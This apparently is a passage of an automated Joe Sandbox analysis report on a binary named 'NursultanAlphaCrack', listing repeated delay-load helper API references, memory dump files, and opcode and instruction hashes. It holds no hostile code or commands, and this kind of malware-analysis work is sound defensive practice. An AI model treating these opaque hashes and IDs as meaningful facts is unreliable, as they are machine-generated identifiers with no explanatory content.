                                                                                        • Instruction Fuzzy Hash: 34B012D2368184BC3148B2492D02C37018CC0C0B22330C13FF809C8380DA407C542871
                                                                                        APIs
                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 001DE1E3
                                                                                          • Part of subcall function 001DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001DE8D0
                                                                                          • Part of subcall function 001DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001DE8E1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                        • String ID: I=u
                                                                                        • API String ID: 1269201914-3032091488
                                                                                        • Opcode ID: 26d5b09059d5453a0944a4c046844f767fce2d23faa05944bb434b99de885ca8
                                                                                        • Instruction ID: 13dec9bd8b78b88ac0f7d7c1cd2a2ed4adf56ffb53bfc07b18bd29c28c9d0b73
                                                                                        • Opcode Fuzzy Hash: 26d5b09059d5453a0944a4c046844f767fce2d23faa05944bb434b99de885ca8
                                                                                        • Instruction Fuzzy Hash: 32B012E1368044BC3108B14A2D02D37018CC0C0F32330803FF909C8280DA407D102871
                                                                                        APIs
                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 001DE1E3
                                                                                          • Part of subcall function 001DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001DE8D0
                                                                                          • Part of subcall function 001DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001DE8E1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                        • String ID: I=u
                                                                                        • API String ID: 1269201914-3032091488
                                                                                        • Opcode ID: ab75535095bdfab0c3d8a9193e04675e5e1ebb918be3f467e71a0778adcb6c93
                                                                                        • Instruction ID: a8027ec2422ff7b256bbac84bb969ffde4d46abd22fc4647b269a649439ce369
                                                                                        • Opcode Fuzzy Hash: ab75535095bdfab0c3d8a9193e04675e5e1ebb918be3f467e71a0778adcb6c93
                                                                                        • Instruction Fuzzy Hash: FAB012E1368044BC3108B1492E03D37018CC0C0F32330803FF909C8280DE417E112871
                                                                                        APIs
                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 001DE1E3
                                                                                          • Part of subcall function 001DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001DE8D0
                                                                                          • Part of subcall function 001DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001DE8E1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                        • String ID: I=u
                                                                                        • API String ID: 1269201914-3032091488
                                                                                        • Opcode ID: fa5fd2fea71e3b8e1edea9bd9528c81a0fc05aff4efb888841b0c16b4fb10d02
                                                                                        • Instruction ID: 3bb4945b55221ae4dd0b7054f618f519bbb29116c8b10fc2d2e9dd0df215c9d4
                                                                                        • Opcode Fuzzy Hash: fa5fd2fea71e3b8e1edea9bd9528c81a0fc05aff4efb888841b0c16b4fb10d02
                                                                                        • Instruction Fuzzy Hash: B3B012E1368184BC3148B1492D02D37018CC0C0F32330813FF909C8280DA417D502871
                                                                                        APIs
                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 001DE1E3
                                                                                          • Part of subcall function 001DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001DE8D0
                                                                                          • Part of subcall function 001DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001DE8E1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                        • String ID: I=u
                                                                                        • API String ID: 1269201914-3032091488
                                                                                        • Opcode ID: bebe642afdf4da37201691cdfe16d4e9d42895b7867a31a81c1a9d460a183890
                                                                                        • Instruction ID: b7b5357cb4d582836436ea3d03926d034eb0bacc3e34bf538d134aa903446823
                                                                                        • Opcode Fuzzy Hash: bebe642afdf4da37201691cdfe16d4e9d42895b7867a31a81c1a9d460a183890
                                                                                        • Instruction Fuzzy Hash: 75B012E1369184BC3148B2492D02C37018DC0C0B22330813FF809CC280DA407C542871
                                                                                        APIs
                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 001DE1E3
                                                                                          • Part of subcall function 001DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001DE8D0
                                                                                          • Part of subcall function 001DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001DE8E1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                        • String ID: I=u
                                                                                        • API String ID: 1269201914-3032091488
                                                                                        • Opcode ID: 75d090b9bd19019965beddfbeb466d9751b0b11ebabe06d4d676ec2426488f6e
                                                                                        • Instruction ID: 589389ace409259b134223b21311454213fbd8418689e0c67971dcd8fdfb1dec
                                                                                        • Opcode Fuzzy Hash: 75d090b9bd19019965beddfbeb466d9751b0b11ebabe06d4d676ec2426488f6e
                                                                                        • Instruction Fuzzy Hash: 97B012D1369084BC3108B1492D02C37018DC0C1B22330C03FFC09CC280DA40BC502871
                                                                                        APIs
                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 001DE1E3
                                                                                          • Part of subcall function 001DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001DE8D0
                                                                                          • Part of subcall function 001DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001DE8E1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                        • String ID: I=u
                                                                                        • API String ID: 1269201914-3032091488
                                                                                        • Opcode ID: d653d84b1ba79445e06237fa82005a5c291a090e7d2e42b1abed40c33d0073f3
                                                                                        • Instruction ID: bbe54fd096fb74cd0c38d554021b615869119f201021ef1849777433e9726073
                                                                                        • Opcode Fuzzy Hash: d653d84b1ba79445e06237fa82005a5c291a090e7d2e42b1abed40c33d0073f3
                                                                                        • Instruction Fuzzy Hash: DEB012D1368054BC3108B1592D02C3701CCC0C1B22330C03FFD09C8280DB80BC102C71
                                                                                        APIs
                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 001DE1E3
                                                                                          • Part of subcall function 001DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001DE8D0
                                                                                          • Part of subcall function 001DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001DE8E1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                        • String ID: I=u
                                                                                        • API String ID: 1269201914-3032091488
                                                                                        • Opcode ID: e1b9ebae728807d07a06580ea80e39a30da8dec1a19140a6a643c736f05d09fc
                                                                                        • Instruction ID: cbb3832405008f0291ea57ebb1afbdb5683dcc4d92b44c91070b302d547794ee
                                                                                        • Opcode Fuzzy Hash: e1b9ebae728807d07a06580ea80e39a30da8dec1a19140a6a643c736f05d09fc
                                                                                        • Instruction Fuzzy Hash: 65B012D1379084BC3108B1492D02C3701CDC4C0B22330803FF80ACC280DA407C102871
                                                                                        APIs
                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 001DE1E3
                                                                                          • Part of subcall function 001DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001DE8D0
                                                                                          • Part of subcall function 001DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001DE8E1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                        • String ID: I=u
                                                                                        • API String ID: 1269201914-3032091488
                                                                                        • Opcode ID: 54305b0e9df52929039a0fd2cdeced66e74c3fc2d3d84183f42166c258c2ec12
                                                                                        • Instruction ID: 973c66d019e0ad971bbd2de4a6a0aec1aa0cbc75389e7c8508dd90f87534c61b
                                                                                        • Opcode Fuzzy Hash: 54305b0e9df52929039a0fd2cdeced66e74c3fc2d3d84183f42166c258c2ec12
                                                                                        • Instruction Fuzzy Hash: 91B012E1368054BC3108B1492E03C3701CCC0C0B22330803FF809C8280DE817D112C71
                                                                                        APIs
                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 001DE1E3
                                                                                          • Part of subcall function 001DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001DE8D0
                                                                                          • Part of subcall function 001DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001DE8E1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                        • String ID: I=u
                                                                                        • API String ID: 1269201914-3032091488
                                                                                        • Opcode ID: 0322425f58e16c974d8d5ad89f304c39774e831d56911a6819ec86fe4d3e510d
                                                                                        • Instruction ID: 6986a04a8b2a6e6c94304b8fb6266b76f14516a4ba29b4b15c079f4a5734c43c
                                                                                        • Opcode Fuzzy Hash: 0322425f58e16c974d8d5ad89f304c39774e831d56911a6819ec86fe4d3e510d
                                                                                        • Instruction Fuzzy Hash: 5EA001E63A918ABC710872566E06C3B029DC4D5B66331892FF916C8695AA91784528B1
                                                                                        APIs
                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 001DE1E3
                                                                                          • Part of subcall function 001DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001DE8D0
                                                                                          • Part of subcall function 001DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001DE8E1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                        • String ID: I=u
                                                                                        • API String ID: 1269201914-3032091488
                                                                                        • Opcode ID: 65a2c6ba9ab1cda7b04e10a2fe5e4996addb5a629b50164c2b28e9e4ae335a55
                                                                                        • Instruction ID: 6986a04a8b2a6e6c94304b8fb6266b76f14516a4ba29b4b15c079f4a5734c43c
                                                                                        • Opcode Fuzzy Hash: 65a2c6ba9ab1cda7b04e10a2fe5e4996addb5a629b50164c2b28e9e4ae335a55
                                                                                        • Instruction Fuzzy Hash: 5EA001E63A918ABC710872566E06C3B029DC4D5B66331892FF916C8695AA91784528B1
                                                                                        APIs
                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 001DE1E3
                                                                                          • Part of subcall function 001DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001DE8D0
                                                                                          • Part of subcall function 001DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001DE8E1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                        • String ID: I=u
                                                                                        • API String ID: 1269201914-3032091488
                                                                                        • Opcode ID: f4f044dae96216564d6e27aa802bde24b7614da896906d065e53e060cd7a6b89
                                                                                        • Instruction ID: 6986a04a8b2a6e6c94304b8fb6266b76f14516a4ba29b4b15c079f4a5734c43c
                                                                                        • Opcode Fuzzy Hash: f4f044dae96216564d6e27aa802bde24b7614da896906d065e53e060cd7a6b89
                                                                                        • Instruction Fuzzy Hash: 5EA001E63A918ABC710872566E06C3B029DC4D5B66331892FF916C8695AA91784528B1
                                                                                        APIs
                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 001DE1E3
                                                                                          • Part of subcall function 001DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001DE8D0
                                                                                          • Part of subcall function 001DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001DE8E1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                        • String ID: I=u
                                                                                        • API String ID: 1269201914-3032091488
                                                                                        • Opcode ID: a9f7117fac2d201c35a76406d73cedc349d5d7840ab2e16ebec304f5477f908c
                                                                                        • Instruction ID: 6986a04a8b2a6e6c94304b8fb6266b76f14516a4ba29b4b15c079f4a5734c43c
                                                                                        • Opcode Fuzzy Hash: a9f7117fac2d201c35a76406d73cedc349d5d7840ab2e16ebec304f5477f908c
                                                                                        • Instruction Fuzzy Hash: 5EA001E63A918ABC710872566E06C3B029DC4D5B66331892FF916C8695AA91784528B1
                                                                                        APIs
                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 001DE1E3
                                                                                          • Part of subcall function 001DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001DE8D0
                                                                                          • Part of subcall function 001DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001DE8E1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                        • String ID: I=u
                                                                                        • API String ID: 1269201914-3032091488
                                                                                        • Opcode ID: 33dcc3be5174a5b27345a8726218b11bdad2b74a012b66dbf1616e3b3c3cd2a9
                                                                                        • Instruction ID: 6986a04a8b2a6e6c94304b8fb6266b76f14516a4ba29b4b15c079f4a5734c43c
                                                                                        • Opcode Fuzzy Hash: 33dcc3be5174a5b27345a8726218b11bdad2b74a012b66dbf1616e3b3c3cd2a9
                                                                                        • Instruction Fuzzy Hash: 5EA001E63A918ABC710872566E06C3B029DC4D5B66331892FF916C8695AA91784528B1
                                                                                        APIs
                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 001DE1E3
                                                                                          • Part of subcall function 001DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001DE8D0
                                                                                          • Part of subcall function 001DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001DE8E1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                        • String ID: I=u
                                                                                        • API String ID: 1269201914-3032091488
                                                                                        • Opcode ID: 88ff16749d8887a5d5583f963dea6d24bd6aa9a69addfb99284c6a5d27d0605a
                                                                                        • Instruction ID: 6986a04a8b2a6e6c94304b8fb6266b76f14516a4ba29b4b15c079f4a5734c43c
                                                                                        • Opcode Fuzzy Hash: 88ff16749d8887a5d5583f963dea6d24bd6aa9a69addfb99284c6a5d27d0605a
                                                                                        • Instruction Fuzzy Hash: 5EA001E63A918ABC710872566E06C3B029DC4D5B66331892FF916C8695AA91784528B1
                                                                                        APIs
                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 001DE1E3
                                                                                          • Part of subcall function 001DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001DE8D0
                                                                                          • Part of subcall function 001DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001DE8E1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
